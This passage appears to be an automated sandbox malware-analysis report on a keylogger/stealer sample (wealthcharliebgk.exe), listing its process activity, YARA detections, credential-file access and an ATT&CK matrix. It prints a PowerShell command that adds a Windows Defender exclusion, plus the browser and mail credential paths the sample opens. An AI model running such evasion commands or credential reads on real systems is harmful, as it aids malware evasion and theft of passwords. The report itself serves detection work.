                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 480000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 7E20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 5860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 8E20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 5A40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 240000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2283Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3570Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeWindow / User API: threadDelayed 9606Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3620Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 3776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4008Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4028Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4028Thread sleep time: -8400000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4032Thread sleep count: 210 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe TID: 4032Thread sleep count: 9606 > 30Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3088Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory written: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeQueries volume information: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeQueries volume information: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts33
                Exploitation for Client Execution                		Boot or Logon Initialization Scripts111
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		14
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter                		Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information                		Security Account Manager1
                Security Software Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Install Root Certificate                		NTDS1
                Query Registry                		Distributed Component Object Model1
                Email Collection                		3
